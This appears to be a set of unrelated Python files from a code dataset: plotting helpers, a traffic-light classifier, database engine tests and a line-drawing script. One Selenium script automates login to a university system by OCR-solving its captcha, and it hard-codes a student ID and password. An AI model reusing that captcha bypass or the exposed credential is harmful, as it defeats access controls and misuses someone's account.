    my_font = define_fonts()
    # BUG FIX: the original dict literal ended with a stray backslash line
    # continuation, which glued the following statement onto the same logical
    # line and made the module fail to parse (SyntaxError).
    my_font[2] = {'family': 'serif', 'color': 'black', 'weight': 'bold', 'size': 11,
                  'horizontalalignment': 'center'}
    my_font[3] = my_font[2]
    return my_font
def place_image(im, ax_arr, my_subs: list):
    """Show each image in its subplot and strip all ticks, labels and axes.

    :im: dict of images keyed by subplot index
    :ax_arr: single Axes (one subplot) or array of Axes (several subplots)
    :my_subs: list of subplot indices to fill
    """
    if len(my_subs) > 1:
        # plt.tight_layout()
        new_left = 0.1
        new_right = 0.9
        new_bottom = 0.1
        new_top = 0.9
        plt.subplots_adjust(wspace=0.1, hspace=0, left=new_left, right=new_right, bottom=new_bottom, top=new_top)
        for k in my_subs:
            ax_arr[k].imshow(im[k])
            ax_arr[k].set_xticklabels([])
            ax_arr[k].set_xticks([])
            ax_arr[k].set_yticklabels([])
            ax_arr[k].set_yticks([])
            ax_arr[k].axis('off')
    else:
        # With a single subplot, plt.subplots returned a bare Axes, not an array.
        ax_arr.imshow(im[0])
        ax_arr.set_xticklabels([])
        ax_arr.set_xticks([])
        ax_arr.set_yticklabels([])
        ax_arr.set_yticks([])
        ax_arr.axis('off')
    return
def mount_frame(path_and_fig, t: int, my_words: dict, n_sub=1, video=False):
    """Mount frame for video
    :path_and_fig: path+name(s) of figure(s)
    :t: time step
    :my_words: dict with 3 keys in order my_title, unit of time, subtitle
    :n_sub: number of subplots
    :video: if True, save duplicated frames for video composition"""
    # ----------------
    my_font = define_fonts()
    # -----------------
    # how many subplots
    my_subs = list(range(0, n_sub))
    # create figure with subplots
    fig_1, ax_arr = plt.subplots(1, n_sub, figsize=(9, 5), dpi=600)
    # retrieve graph plots as images
    im = {}
    if n_sub == 1:
        if isinstance(path_and_fig, str):
            im[0] = plt.imread(path_and_fig)
        else:
            im[0] = plt.imread(path_and_fig[2])
    else:
        for i in my_subs:
            im[i] = plt.imread(path_and_fig[i])
    # -------------------
    # plot text
    # insert time step
    # NOTE(review): this mutates the caller's my_words dict in place, so a
    # second call with the same dict appends the time step twice — confirm
    # callers pass a fresh dict each time.
    my_words[0]['text'] = my_words[0]['text'] + str(t)
    # title and subtitle
    for line in range(0, 2):
        my_text = my_words[line]['text']
        x, y = my_words[line]['xy']
        fig_1.text(x, y, my_text, fontdict=my_font[line])
    if n_sub == 3:
        for col in range(1, 5):
            my_text = my_words[col]['text']
            x, y = my_words[col]['xy']
            # same for all cols
            idx = 1
            fig_1.text(x, y, my_text, fontdict=my_font[idx])
        for col in range(5, 11):
            my_text = my_words[col]['text']
            x, y = my_words[col]['xy']
            # same for all sub cols
            idx = 2
            fig_1.text(x, y, my_text, fontdict=my_font[idx])
    # labels
    my_hazard_labels(fig_1)
    # cax = plt.axes([0.85, 0.1, 0.075, 0.8])
    # plt.colorbar(cax=cax)
    # # -------------------
    # take out axis stuff
    place_image(im, ax_arr, my_subs)
    # -------------------
    # save in folder
    frame_idx = t
    save_frame(path_and_fig, frame_idx, video)
def save_frame(path_and_fig, frame_idx, video=False, key='hazard'):
    """Save the current figure: duplicated frames for video, else one frame.

    `key` only affects the file name in the single-frame case.
    """
    folder = os.path.dirname(path_and_fig[0])
    if video:
        save_copied_frames(folder, frame_idx)
    else:
        save_one_frame(folder, frame_idx, key)
def save_one_frame(path_to_folder, frame_idx, key='hazard'):
    """Save the current matplotlib figure as <path_to_folder>/<key>_NNNN.png.

    :path_to_folder: destination folder
    :frame_idx: integer frame number, zero-padded to four digits
    :key: file-name prefix
    """
    my_format = ".png"
    frame_string = str(frame_idx).rjust(4, "0")
    fname = path_to_folder + "/" + key + "_" + frame_string + my_format
    # plt.figure(figsize=(4, 8), dpi=400)
    # FIX: dropped `papertype=None` — the kwarg was deprecated in Matplotlib
    # 3.8 and later removed, so passing it crashes on current versions; it was
    # a no-op (None) here anyway.
    plt.savefig(fname, facecolor=None, edgecolor=None,
                orientation='landscape',
                transparent=True)
def save_copied_frames(path_to_folder: str, frame_idx: int, n_frames_per=60):
    """Save the current figure n_frames_per times so the video lingers on it."""
    my_format = ".png"
    # change n_start to 140 for complete video 140 # n_frame_per * 3
    n_start = 0
    for offset in range(n_frames_per):
        number = n_start + offset + frame_idx * n_frames_per
        padded = str(number).rjust(4, "0")
        fname = path_to_folder + "/" + "frame_" + padded + my_format
        # plt.figure(figsize=(4, 8), dpi=400)
        plt.savefig(fname, facecolor=None, edgecolor=None, orientation='landscape', transparent=True)
def my_rooms_label(fig_1, xy: list, rooms, f_size=12):
    """Write each room name on the figure at the given (x, y) positions.

    'HALL 1' is rotated 270 degrees; all other labels are horizontal.
    Returns the figure for chaining.
    """
    for i, r in enumerate(rooms):
        c = 0
        if r == 'HALL 1':
            c = 270
        x = xy[i][0]
        y = xy[i][1]
        my_font = {'family': 'sans-serif', 'color': 'grey', 'weight': 'heavy', 'size': f_size,
                   'horizontalalignment': 'left'}
        fig_1.text(x, y, rooms[i], fontdict=my_font, rotation=c)
    return fig_1
def my_hazard_labels(fig_1, xy=None, f_size=12):
    """Draw the five-level hazard legend (colored dot + label) on the figure.

    :xy: optional (x, y) start for the text labels; defaults to (0.31, 0.1)
    Returns the figure for chaining.
    """
    levels = [1, 2, 3, 4, 5]
    # level_label = ['Low', 'Moderate', 'High', 'Very High', 'Extreme']
    # level_color = ['green', 'blue', 'yellow', 'orange', 'red']
    level_color = color_levels(True)
    level_label = label_levels()
    my_font = {}
    if xy is None:
        x, y = 0.31, 0.1
    else:
        x, y = xy[0], xy[1]
    # Dot positions in data coordinates; the fixed increments below were
    # presumably hand-tuned to the default figure layout — TODO confirm.
    x_, y_ = -6, 3.8
    for i in levels:
        my_font[i] = {'family': 'sans-serif', 'color': 'black', 'weight': 'heavy', 'size': f_size,
                      'horizontalalignment': 'left'}
        plt.plot(x_, y_, color=level_color[i], marker='o', markersize=6)
        fig_1.text(x, y, level_label[i], fontdict=my_font[i])
        y = y + 0.06 # 0.08
        y_ = y_ + 4.7
    return fig_1
def empty_my_words(n: int):
    """Return n placeholder entries: {i: {'text': '', 'xy': (0.0, 0.0)}}."""
    return {i: {'text': '', 'xy': (0.0, 0.0)} for i in range(n)}
def color_levels(normalized=False):
    """Return the RGB color for each hazard level 1-5.

    Values are 0-255 integer triples, or 0-1 floats when normalized is True.
    Change colors here.
    """
    level = {
        1: (60, 180, 60),    # green
        2: (200, 200, 30),   # yellow-green
        3: (240, 215, 40),   # yellow
        4: (250, 120, 50),   # orange
        5: (255, 30, 30),    # red
    }
    if normalized is True:
        level = {k: (r / 255, g / 255, b / 255) for k, (r, g, b) in level.items()}
    return level
def label_levels():
    """Return the display label for each hazard level 1-5."""
    return {1: 'Low', 2: 'Moderate', 3: 'High', 4: 'Very High', 5: 'Extreme'}
def match_level_color(my_level: int):
    """Return the RGBA vertex color for the given hazard level (1-5)."""
    palette = color_levels(True)
    return set_vertex_color(palette[my_level])
def set_vertex_color(my_color: tuple):
    """Extend an RGB tuple with full opacity (alpha = 1), giving RGBA."""
    red, green, blue = my_color
    return red, green, blue, 1
def create_dict(my_keys, default_value):
    """Return {key: default_value for key in my_keys}.

    A dict default is rejected (replaced by None), because every key would
    otherwise share the same mutable object.
    """
    if isinstance(default_value, dict):
        print('Starting default value as {} will cause everything to have the same value')
        default_value = None
    return {key: default_value for key in my_keys}
# ------------------------------------------------------------
def mount_coord_frame(path_and_fig, t: int, my_words: dict, n_sub=1, video=False):
    """Mount frame for video
    :path_and_fig: path+name(s) of figure(s)
    :t: time step
    :my_words: dict with 3 keys in order my_title, subtitle, left title, right title
    :n_sub: number of subplots
    :video: if True, save duplicated frames for video composition"""
    # ----------------
    my_font = define_fonts2()
    # -----------------
    # how many subplots
    my_subs = list(range(0, n_sub))
    # create figure with subplots
    fig_1, ax_arr = plt.subplots(1, n_sub, figsize=(9, 5), dpi=600)
    # retrieve graph plots as images
    im = {}
    if n_sub == 1:
        if isinstance(path_and_fig, str):
            im[0] = plt.imread(path_and_fig)
        else:
            im[0] = plt.imread(path_and_fig[2])
    else:
        for i in my_subs:
            im[i] = plt.imread(path_and_fig[i])
    # -------------------
    # plot text
    # insert time step
    # title and subtitle
    for line in my_words.keys():
        my_text = my_words[line]['text']
        x, y = my_words[line]['xy']
        fig_1.text(x, y, my_text, fontdict=my_font[line])
    if n_sub == 3:
        for col in range(1, 5):
            my_text = my_words[col]['text']
            x, y = my_words[col]['xy']
            # same for all cols
            idx = 1
            fig_1.text(x, y, my_text, fontdict=my_font[idx])
        for col in range(5, 11):
            my_text = my_words[col]['text']
            x, y = my_words[col]['xy']
            # same for all sub cols
            idx = 2
            fig_1.text(x, y, my_text, fontdict=my_font[idx])
    # labels
    # my_hazard_labels(fig_1)
    # cax = plt.axes([0.85, 0.1, 0.075, 0.8])
    # plt.colorbar(cax=cax)
    # # -------------------
    # take out axis stuff
    place_image(im, ax_arr, my_subs)
    # -------------------
    # save in folder
    frame_idx = t
    save_frame(path_and_fig, frame_idx, video, 'frame')
class CustomizePlot:
    """Container of plot-styling options (lines, markers, fonts, text, axes)."""

    def __init__(self):
        # line specs
        self.line_style = 'solid'
        self.line_color = 'k'
        self.line_width = 2
        # marker specs
        self.marker = None
        self.marker_color = self.line_color
        self.marker_size = 5
        # title
        self.title = None
        self.subtitle = None
        self.fonts = self.set_fonts()
        # other text
        self.text = None
        self.text_pos = self.set_pos()
        # axis
        self.xlabel = None
        self.ylabel = None
        # legend
        self.legend = None
        # orientation
        self.orientation = 'landscape'

    @staticmethod
    def set_fonts():
        """Return the default font dicts for subtitle/title/text slots 0-4."""
        size_title = 13
        size_subtitle = 12
        size_text = 10
        my_fonts = dict()
        my_fonts[0] = {'family': 'serif', 'color': 'darkblue', 'weight': 'normal', 'size': size_subtitle,
                       'horizontalalignment': 'center'}
        my_fonts[1] = {'family': 'serif', 'color': 'darkred', 'weight': 'normal', 'size': size_title,
                       'horizontalalignment': 'center'}
        my_fonts[2] = {'family': 'serif', 'color': 'darkgray', 'weight': 'normal', 'size': size_text,
                       'horizontalalignment': 'center'}
        my_fonts[3] = {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': size_title,
                       'horizontalalignment': 'center'}
        my_fonts[4] = {'family': 'serif', 'color': 'black', 'weight': 'normal', 'size': size_title,
                       'horizontalalignment': 'center'}
        return my_fonts

    def set_pos(self, list_pos=None):
        # NOTE(review): dual-purpose method — with no argument it RETURNS the
        # default positions (used by __init__); with a list it instead SETS
        # self.text_pos and returns None.  Confirm callers expect this.
        positions = dict()
        if list_pos is None:
            positions[0] = (0.5, 0.93)
            positions[1] = (0.5, 0.88)
            positions[2] = (0.5, 0.83)
            positions[3] = (0.30, 0.05)
            positions[4] = (0.75, 0.05)
            return positions
        else:
            i = 0
            for el in list_pos:
                positions[i] = el
                i += 1
            self.text_pos = positions

    def set_l_style(self, my_style: str):
        """Set the line style (e.g. 'solid', 'dashed')."""
        self.line_style = my_style

    def set_l_color(self, my_color: str):
        # Intentionally also updates the marker color to keep them in sync.
        self.line_color = my_color
        self.marker_color = my_color

    def set_l_width(self, my_w: int):
        """Set the line width."""
        self.line_width = my_w

    def set_marker(self, my_marker: str):
        """Set the marker symbol (e.g. 'o', 'x')."""
        self.marker = my_marker

    def set_marker_size(self, my_size: int):
        """Set the marker size."""
        self.marker_size = my_size

    def set_marker_color(self, my_color: str):
        """Set the marker color independently of the line color."""
        self.marker_color = my_color

    def set_text(self, my_text: dict):
        """Set the extra text entries to draw on the plot."""
        self.text = my_text
| StarcoderdataPython |
# Read two integers and print A*B - (A + B - 1), i.e. (A - 1) * (B - 1).
A, B = map(int, input().split())
print((A - 1) * (B - 1))
| StarcoderdataPython |
1614431 | <filename>ros/src/tl_detector/light_classification/tl_classifier.py
import rospy
from styx_msgs.msg import TrafficLight
import tensorflow as tf
import numpy as np
import datetime
import cv2
class TLClassifier(object):
    def __init__(self, is_sim):
        """Load the frozen object-detection graph and open a TF session.

        :is_sim: True selects the simulator-trained model; False selects the
            model trained on site data (paths containing "byrd").
        """
        if is_sim:
            #PATH_TO_MODEL = 'light_classification/models/rfcn_resnet101_coco_sim/frozen_inference_graph.pb'
            #PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_sim/frozen_inference_graph.pb'
            #PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_150_150_sim/frozen_inference_graph.pb'
            PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_300_300_sim/frozen_inference_graph.pb'
        else:
            #PATH_TO_MODEL = r'light_classification/models/rfcn_resnet101_coco_byrd/frozen_inference_graph.pb'
            PATH_TO_MODEL = r'light_classification/models/ssd_inception_v2_coco_byrd/frozen_inference_graph.pb'
        self.graph = tf.Graph()
        with self.graph.as_default():
            with tf.gfile.GFile(PATH_TO_MODEL, 'rb') as f:
                graph_def = tf.GraphDef()
                graph_def.ParseFromString(f.read())
                tf.import_graph_def(graph_def, name='')
            # Cache handles to the detector's input and output tensors.
            self.image_tensor = self.graph.get_tensor_by_name('image_tensor:0')
            self.boxes = self.graph.get_tensor_by_name('detection_boxes:0')
            self.scores = self.graph.get_tensor_by_name('detection_scores:0')
            self.classes = self.graph.get_tensor_by_name('detection_classes:0')
            self.num_detections = self.graph.get_tensor_by_name('num_detections:0')
        self.sess = tf.Session(graph=self.graph)
def integrate_scores(self,scores,classes):
tmp = {1:0,2:0,3:0,4:0}
total = 0
for s,c in zip(scores,classes):
tmp[c]+=s
total+=s
mx = 0.5
sel = 4
for key,val in tmp.items():
if val/total>mx:
sel= key
mx= val/total
return (sel,mx)
def get_classification(self, image):
"""Determines the color of the traffic light in the image
Args:
image (cv::Mat): image containing the traffic light
Returns:
int: ID of traffic light color (specified in styx_msgs/TrafficLight)
"""
image_size = cv2.resize(image,(150,150))
image_exp = np.expand_dims(image_size, axis=0)
#image_exp = np.expand_dims(image, axis=0)
start = datetime.datetime.now()
(boxes, scores, classes, num_detection) = self.sess.run([self.boxes, self.scores, self.classes, self.num_detections], feed_dict={self.image_tensor: image_exp})
end = datetime.datetime.now()
c = end - start
#print("Time for classification: ", c.total_seconds())
boxes = np.squeeze(boxes)
scores = np.squeeze(scores)
classes = np.squeeze(classes).astype(np.int32)
#rospy.loginfo("scores: %f, classes: %d", scores[0], classes[0])
#rospy.loginfo("scores: %s, classes: %s", str(scores), str(classes))
#print("scores: ",scores[0], ", classes: ", classes[0])
out = self.integrate_scores(scores,classes)
#rospy.loginfo("scores: %f, classes: %d",out[1] , out[0])
#civ2.imwrite('/home/student/output/'+str(start)+'_{0}_{1:.2f}'.format(out[0],out[1])+'.png',image_size)
if out[1] > 0.5:
if out[0] == 1:
return TrafficLight.GREEN
elif out[0] == 2:
return TrafficLight.RED
elif out[0] == 3:
return TrafficLight.YELLOW
#if scores[0] > 0.5:
# if classes[0] == 1:
# return TrafficLight.GREEN
# elif classes[0] == 2:
# return TrafficLight.RED
# elif classes[0] == 3:
# return TrafficLight.YELLOW
return TrafficLight.UNKNOWN
| StarcoderdataPython |
30093 | <reponame>JcDelay/pycr<gh_stars>1-10
"""This module provides convenient use of EDITOR"""
import os
import subprocess
import tempfile
from libpycr.config import Config
def get_editor():
    """Return the user's preferred editor, falling back to vi.

    The EDITOR environment variable wins over VISUAL; empty values are
    treated as unset.

    :rtype: str
    """
    for variable in ('EDITOR', 'VISUAL'):
        editor = os.environ.get(variable)
        if editor:
            return editor
    return 'vi'
def strip_comments(data, line_comment='#'):
    """Return *data* with blank lines and comment lines removed.

    A line counts as a comment when its first character equals
    *line_comment*.  The surviving lines are re-joined and the result is
    stripped of leading/trailing whitespace.

    :param data: multiline text to strip comments from
    :type data: str
    :param line_comment: the line comment delimiter
    :type line_comment: str
    :rtype: str
    """
    kept = [line for line in data.splitlines()
            if line and line[0] != line_comment]
    return '\n'.join(kept).strip()
def raw_input_editor(default=None):
    """Request user input by firing an editor

    Like the built-in raw_input(), except that it uses a visual text editor
    for ease of editing.  The editor comes from the ``core.editor`` config
    value, falling back to :func:`get_editor`.

    :param default: the initial content of the editor
    :type default: str | None
    :return: the edited text, stripped of surrounding whitespace
    :rtype: str
    """
    editor = Config.get('core.editor', get_editor())
    # delete=False so the file survives closing; it is removed manually
    # after the edited content has been read back.
    with tempfile.NamedTemporaryFile(mode='r+', delete=False) as tmpfile:
        if default:
            tmpfile.write(default)
            tmpfile.flush()
        # NOTE: We need to close then re-open the file after edition to ensure
        # that buffers are correctly emptied on all platforms.
        tmpfile.close()
        subprocess.check_call([editor, tmpfile.name])
        with open(tmpfile.name) as comment_file:
            comment = comment_file.read().strip()
    os.unlink(tmpfile.name)
    return comment
| StarcoderdataPython |
92746 | <gh_stars>1-10
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from datetime import datetime
from unittest import mock
import pytest
from spotrix.db_engine_specs.firebird import FirebirdEngineSpec
# Expected SQL emitted by FirebirdEngineSpec for each ISO-8601 time-grain
# duration; a key of None means the column is passed through untruncated.
grain_expressions = {
    None: "timestamp_column",
    "PT1S": (
        "CAST(CAST(timestamp_column AS DATE) "
        "|| ' ' "
        "|| EXTRACT(HOUR FROM timestamp_column) "
        "|| ':' "
        "|| EXTRACT(MINUTE FROM timestamp_column) "
        "|| ':' "
        "|| FLOOR(EXTRACT(SECOND FROM timestamp_column)) AS TIMESTAMP)"
    ),
    "PT1M": (
        "CAST(CAST(timestamp_column AS DATE) "
        "|| ' ' "
        "|| EXTRACT(HOUR FROM timestamp_column) "
        "|| ':' "
        "|| EXTRACT(MINUTE FROM timestamp_column) "
        "|| ':00' AS TIMESTAMP)"
    ),
    "P1D": "CAST(timestamp_column AS DATE)",
    "P1M": (
        "CAST(EXTRACT(YEAR FROM timestamp_column) "
        "|| '-' "
        "|| EXTRACT(MONTH FROM timestamp_column) "
        "|| '-01' AS DATE)"
    ),
    "P1Y": "CAST(EXTRACT(YEAR FROM timestamp_column) || '-01-01' AS DATE)",
}
@pytest.mark.parametrize("grain,expected", grain_expressions.items())
def test_time_grain_expressions(grain, expected):
    """Each supported grain's template must render the expected SQL."""
    template = FirebirdEngineSpec._time_grain_expressions[grain]
    assert template.format(col="timestamp_column") == expected
def test_epoch_to_dttm():
    """Epoch seconds must be converted via DATEADD from the zero timestamp."""
    rendered = FirebirdEngineSpec.epoch_to_dttm().format(col="timestamp_column")
    assert rendered == "DATEADD(second, timestamp_column, CAST('00:00:00' AS TIMESTAMP))"
def test_convert_dttm():
    """Datetime literals must be rendered per target SQL type; unknown types
    yield None."""
    dttm = datetime(2021, 1, 1)
    expectations = {
        "timestamp": "CAST('2021-01-01 00:00:00' AS TIMESTAMP)",
        "TIMESTAMP": "CAST('2021-01-01 00:00:00' AS TIMESTAMP)",
        "TIME": "CAST('00:00:00' AS TIME)",
        "DATE": "CAST('2021-01-01' AS DATE)",
    }
    for sql_type, expected in expectations.items():
        assert FirebirdEngineSpec.convert_dttm(sql_type, dttm) == expected
    assert FirebirdEngineSpec.convert_dttm("STRING", dttm) is None
| StarcoderdataPython |
1701293 | <reponame>Tachyu/PythonCodes
#encoding:utf-8
import re
import string
import sys
import os
import io
import urllib
import urllib2
import cookielib
import requests
import getpass
import pytesser
from lxml import etree
from pytesser import *
import lxml.html.soupparser as soupparser
import splinter
import time
import random
import selenium
import shutil
from selenium import webdriver
from splinter import browser
reload(sys)
sys.setdefaultencoding('utf-8')
#登陆页面
loginpage = r"http://172.16.58.3/"
vrifycodeUrl = "http://172.16.58.3/validateCodeAction.do?"
# 0.登陆
# 1.课程表
# 2.成绩
# 3.个人信息
# 4.可用教室
# 5.选课
# 6.评教
my_class_xp = r'本学期课表' #1
iedriver = "E:\IEDriverServer.exe"
os.environ["webdriver.ie.driver"] = iedriver
driver = webdriver.Ie(iedriver)
if len(sys.argv) == 1:
print u'''
# 0.登陆\n
# 1.课程表\n
# 2.成绩\n
# 3.个人信息\n
# 4.可用教室\n
# 5.选课\n
# 6.评教\n
'''
student_id = raw_input("ID: ")
passWord = <PASSWORD>("password: ")
choice = int(raw_input("choice: "))
elif len(sys.argv) == 2:
student_id = '14281023'
passWord = '<PASSWORD>'
choice = int(sys.argv[1])
elif len(sys.argv) == 4:
student_id = sys.argv[1]
passWord = sys.argv[2]
choice = int(sys.argv[3])
#创建临时目录
try:
os.mkdir('temp')
except:
pass
#识别错误的验证码图片
error_image = Image.new("RGB", [100,100], (255,255,255))
def getCode(rand_code):
    """OCR the login captcha out of a full-page screenshot.

    The screenshot for this attempt is named ``urp_<rand_code>...`` inside
    the ``temp`` directory.  Returns the 4-character captcha text, or ''
    when recognition failed (the cleaned image is then saved under
    errorReport/ for later inspection).
    """
    global error_image
    # Locate the screenshot written for this attempt.
    # BUG FIX: the original matched against the *global* ``ran_code``
    # instead of the ``rand_code`` parameter it was handed (and declared a
    # nonexistent ``error_time`` global).
    files = os.listdir('temp')
    picName = u'temp/'
    for f in files:
        if f.find('urp_' + str(rand_code)) != -1:
            picName += f.decode('gbk')
            break
    im = Image.open(picName)
    # Crop the captcha region and flatten it onto a white background.
    region = (318, 288, 398, 308)
    cropImg = im.crop(region)
    bg = Image.new("RGB", cropImg.size, (255, 255, 255))
    bg.paste(cropImg, cropImg)
    bg = bg.convert('L')
    # Binarise: everything darker than the threshold becomes black.
    threshold = 150
    table = []
    for i in range(256):
        if i < threshold:
            table.append(0)
        else:
            table.append(1)
    bg = bg.point(table, '1')
    bg.show()
    v_yzm = image_to_string(bg)
    # Patch up the OCR engine's common confusions.
    v_yzm = v_yzm.replace('NN', 'W')
    v_yzm = v_yzm.replace('?', 'f')
    v_yzm = v_yzm.replace('|', 'l')
    v_yzm = v_yzm.replace('_', '')
    pattern = re.compile('\W')
    v_yzm = re.sub(pattern, '', v_yzm)
    if len(v_yzm) == 4:
        return v_yzm
    # Recognition failed: keep the image for debugging and report failure.
    bg.save(r'errorReport/' + v_yzm + r'_s1.jpg')
    return ''
# Log in: up to 10 full attempts; each attempt retries captcha recognition
# up to 5 times before submitting the form.
try_time = 0
while True and try_time < 10:
    driver.get(loginpage)
    # Type the hard-coded credentials into the login form.
    driver.find_element_by_name('zjh').send_keys("14281023")
    driver.find_element_by_name('mm').send_keys('zmy10086')
    v_yzm = ''  # recognised captcha text
    yzm_trytime = 0
    while len(v_yzm) != 4 and yzm_trytime < 5:
        if yzm_trytime != 0:
            # Click the captcha link to fetch a fresh image before retrying.
            driver.find_element_by_tag_name('a').click()
            time.sleep(0.1)
        ran_code = random.random()  # unique tag for this screenshot
        driver.save_screenshot('E:\\Python Sourse File\\temp\\urp_' + str(ran_code) + '.jpg')
        v_yzm = getCode(ran_code)
        yzm_trytime += 1
    driver.find_element_by_xpath('/html/body/table/tbody/tr/td/table[3]/tbody/tr/td[2]/form/table/tbody/tr[2]/td/table/tbody/tr[3]/td[2]/input').send_keys(v_yzm)
    driver.find_element_by_id('btnSure').click()
    # time.sleep(0.2)
    try:
        # If the login page is still there the button can be clicked again
        # (login failed); if it is gone the click raises and we are in.
        print v_yzm
        driver.find_element_by_id('btnSure').click()
    except Exception as e:
        print 'Success!'
        break
    # Keep the failed captcha for later inspection.
    error_image.save(r'errorReport/' + v_yzm + r'_s2.jpg')
    try_time += 1
# driver.get(url_dic[choice])
# driver.find_element_by_name(url_dic[choice])
time.sleep(1)
my_class_url = r'http://121.194.57.131/xskbAction.do?actionType=1' #1 timetable
list_wj_url = r'http://172.16.58.3/jxpgXsAction.do?oper=listWj' #6 evaluation
driver.get(my_class_url)
driver.switch_to_alert().dismiss()
# Delete the temporary screenshot files.
files = os.listdir('temp')
for file in files:
    try:
        targetFile = os.path.join('temp', file)
        if os.path.isfile(targetFile):
            os.remove(targetFile)
    except Exception as e:
        pass
print u'删除成功'
3330500 | """
Setup script for failnozzle.
"""
from setuptools import setup
if __name__ == '__main__':
    # Standard setuptools entry point for the failnozzle package; bundled
    # *.txt files are shipped as package data.
    setup(name='failnozzle',
          version='1.0',
          packages=['failnozzle'],
          package_dir={'failnozzle': 'failnozzle'},
          install_requires=['gevent', 'Jinja2'],
          package_data={'failnozzle': ['*.txt']})
| StarcoderdataPython |
1633848 | import os
import random
from statistics import mean
import string
import uuid
import sys
import tracery
import spacy
import pyocr
import pyocr.builders
from PIL import Image, ImageDraw, ImageFilter
# Pixel padding used when testing whether a drawn line collides with a word.
BOUND_PADDING = 50
# Pixel padding drawn around a preserved word box.
BOX_PADDING = 50  # 10
WOBBLE_MAX = 2  # NOTE(review): appears unused in this file -- confirm
nlp = spacy.load('en')  # English spaCy pipeline used for POS tagging
def draw_vertical_lines(draw, boxes, doc_bounding_box, line_width):
    """Cover the page with vertical ink strokes, skipping the word boxes.

    For each column of width ``line_width`` across the document's bounding
    box, any word box it overlaps splits the stroke into segments above and
    below the box.
    """
    line_weight_factor = random.triangular(0.005, 1.2)
    current_x = doc_bounding_box[0] - line_width / 2
    color = get_color()
    while current_x < doc_bounding_box[2]:
        start_x = current_x
        start_y = doc_bounding_box[1] - line_width / 2
        end_x = start_x
        end_y = doc_bounding_box[3] - line_width / 2
        # Horizontal extent of the current stroke column.
        bx0 = start_x
        bx1 = start_x + line_width
        select_boxes = []
        for box in boxes:
            wx0 = box.position[0][0] - BOUND_PADDING
            wx1 = box.position[1][0] + BOUND_PADDING
            # Overlap test: box inside column, or either column edge inside box.
            if bx0 < wx0 and wx1 < bx1 or \
               wx0 < bx1 and bx1 < wx1 or \
               wx0 < bx0 and bx0 < wx1:
                select_boxes.append(box)
        if select_boxes:
            # Draw the column in segments, leaving a gap at each box.
            y0 = start_y
            y1 = end_y
            for box in select_boxes:
                y1 = box.position[0][1] - BOX_PADDING
                draw_line(draw, [start_x, y0, end_x, y1], line_width=line_width, color=color,
                          line_weight_factor=line_weight_factor, dir='v')
                y0 = box.position[1][1] + BOX_PADDING
            # Final segment from below the last box to the page bottom.
            draw_line(draw, [start_x, y0, end_x, end_y], line_width=line_width, color=color,
                      line_weight_factor=line_weight_factor, dir='v')
        else:
            draw_line(draw, [start_x, start_y, end_x, end_y], line_width=line_width, color=color,
                      line_weight_factor=line_weight_factor, dir='v')
        current_x = start_x + line_width
def get_color():
if random.randint(0, 100) == 0:
color = (179, 27, 27)
else:
color = (int(random.triangular(0, 10, 1)),
int(random.triangular(0, 10, 1)),
int(random.triangular(0, 10, 1)),
)
return color
def draw_horizontal_lines(draw, boxes, doc_bounding_box, line_width):
    """Draw black horizontal lines across the page _except_ for that word"""
    line_weight_factor = random.triangular(0.005, 1.2)
    color = get_color()
    start_x = doc_bounding_box[0]
    current_y = doc_bounding_box[1]
    end_x = doc_bounding_box[2]
    end_y = doc_bounding_box[3] - line_width / 2  # NOTE(review): unused
    while current_y < doc_bounding_box[3]:
        # Vertical extent of the current stroke row.
        by0 = current_y
        by1 = current_y + line_width
        select_boxes = []
        for box in boxes:
            wy0 = box.position[0][1]
            wy1 = box.position[1][1]
            # Overlap test: box inside row, or either row edge inside box.
            if by0 <= wy0 and wy1 <= by1 or \
               wy0 <= by1 and by1 <= wy1 or \
               wy0 <= by0 and by0 <= wy1:
                select_boxes.append(box)
        if select_boxes:
            # Draw the row in segments, leaving a gap at each box.
            x0 = start_x
            x1 = end_x
            for box in select_boxes:
                x1 = box.position[0][0] - BOX_PADDING
                draw_line(draw, [x0, current_y, x1, current_y],
                          line_width=line_width,
                          line_weight_factor=line_weight_factor, color=color,
                          dir="h")
                x0 = box.position[1][0] + BOX_PADDING
            # Final segment from after the last box to the right margin.
            draw_line(draw, [x0 + BOX_PADDING, current_y, end_x, current_y],
                      line_width=line_width, line_weight_factor=line_weight_factor, dir="h", color=color)
        else:
            draw_line(draw, [start_x, current_y, end_x, current_y],
                      line_width=line_width, color=color,
                      line_weight_factor=line_weight_factor,
                      dir="h")
        current_y = by1
def draw_line(draw, pos, line_width, dir="h", color=(0, 0, 0), line_weight_factor=1):
    """Render one "hand-drawn" stroke by overpainting it 10-20 times with
    jittered endpoints, widths and opacity.

    NOTE: ``pos`` ([x0, y0, x1, y1]) is mutated in place by the jitter.
    """
    # Draw a fuzzy line of randomish width repeat times
    repeat = random.randint(10, 20)
    width = int(line_width) * line_weight_factor
    default_padding = line_width / 3
    margin_extent = 20  # random.int(1, 20) previously; now fixed
    # Slide the center of the line down width/2 based on dir
    if dir == 'h':
        pos[1] += width / 2
        pos[3] += width / 2
        # Introduce some randomness into the margins
        pos[0] -= random.triangular(width / margin_extent, width * margin_extent)
        pos[2] += random.triangular(width / margin_extent, width * margin_extent)
    else:
        pos[0] -= width / 2
        pos[2] -= width / 2
        # Introduce some randomness into the margins
        pos[1] -= random.triangular(width / margin_extent, width * margin_extent)
        pos[3] += random.triangular(width / margin_extent, width * margin_extent)
    for i in range(0, repeat):
        # Each pass nudges every coordinate and redraws slightly translucent.
        width = int(random.uniform(line_width - default_padding, line_width))
        padding = default_padding * 4
        pos[0] = random.triangular(pos[0] - padding, pos[0] + padding)
        pos[1] = random.triangular(pos[1] - padding, pos[1] + padding)
        pos[2] = random.triangular(pos[2] - padding, pos[2] + padding)
        pos[3] = random.triangular(pos[3] - padding, pos[3] + padding)
        opacity = 240 + i
        width_factor = random.triangular(1, 10, 1)
        draw.line(pos, width=int(width / width_factor), fill=(*color, opacity))
def get_boxes(imagefile, tool):
